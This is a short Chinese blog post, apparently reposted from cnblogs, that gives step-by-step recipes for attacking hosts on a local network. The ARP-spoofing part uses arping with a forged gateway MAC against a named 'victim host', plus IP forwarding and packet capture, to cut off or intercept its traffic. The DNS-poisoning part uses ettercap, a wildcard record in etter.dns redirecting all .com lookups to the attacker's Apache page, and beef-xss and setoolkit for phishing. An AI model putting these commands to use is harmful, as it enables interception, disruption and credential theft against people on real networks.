码迷,mamicode.com
首页 > 其他好文 > 详细

局域网攻击

时间:2020-09-23 23:01:30      阅读:43      评论:0      收藏:0      [点我收藏+]

标签:传输   模式   一个   net   数据链路层   扫描   com   本机   修改dns   

局域网攻击

ARP欺骗

arp地址转换协议,工作在数据链路层,IP和mac地址的转换
arp -a arp表
tcp/ip 五层:
物理层
数据链路层
网络层
传输层
应用层

 

arping 实现 arp攻击

 1 #Arping简要使用
 2 -d arp缓冲清理
 3 -A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。 
 4 -b:发送以太网广播帧,arping在开始时使用广播地址,在收到回复后使用unicast单播地址。 
 5 -c:发送指定的count个ARP REQUEST包后停止。如果指定了-w参数,则会等待相同数量的ARP REPLY包,直到超时为止。 
 6 -D:重复地址探测模式,用来检测有没有IP地址冲突,如果没有IP冲突则返回0。
 7 -f:收到第一个响应包后退出。 
 8 -h:显示帮助页。 
 9 -I:用来发送ARP REQUEST包的网络设备的名称。 
10 -q:quite模式,不显示输出。 
11 -U:无理由的(强制的)ARP模式去更新别的主机上的ARP CACHE列表中的本机的信息,不需要响应。 
12 -V:显示arping的版本号。 
13 -w:指定一个超时时间,单位为秒,arping在到达指定时间后退出,无论期间发送或接收了多少包。在这种情况下,arping在发送完指定的count(-c)个包后并不会停止,而是等待到超时或发送的count个包都进行了回应后才会退出。 
14 -s:设置发送ARP包的IP资源地址,如果为空,则按如下方式处理: 
15 1、DAD模式(-D)设置为0.0.0.016 2、Unsolicited模式(-U)设置为目标地址; 
17 3、其它方式,从路由表计算。

 

#Arp欺骗命令,断网攻击

1 #将受害主机IP的网关地址伪造实现数据断网或截获
2 Arping -s 伪造MAC -S 网关IP地址 受害主机IP地址
3 
4 #开启数据转发
5 echo 1 > /proc/sys/net/ipv4/ip_forward
6 
7 #运行本地抓包
8 wireshark

 

DNS投毒

 1 DNS投毒
 2 #启动 kali
 3 ettercap -G
 4 
 5 hosts 下面有个扫描当前的主机
 6 add to target1 和2 就是双向欺骗
 7 常见配置:1为受害者,2为网关
 8 mitm 下的 sniff remote connections打上
 9 
10 #修改dns解析记录
11 vim /etc/ettercap/etter.dns
12 在里面加上一行:
13 *.*.com A 192.168.33.143
14 
15 开启apache 网站
16 /var/www/html/ 修改自定义页面
17 service apache2 start
18 
19 开启plugins 的dns_spoof
20 
21 
22 #配合beef
23 beef-xss
24 
25 #配合钓鱼
26 setoolkit
27 选择 2 5 2
28 
29 #netfuke使用
30 很nb

 

局域网攻击

标签:传输   模式   一个   net   数据链路层   扫描   com   本机   修改dns   

原文地址:https://www.cnblogs.com/trevain/p/13696799.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!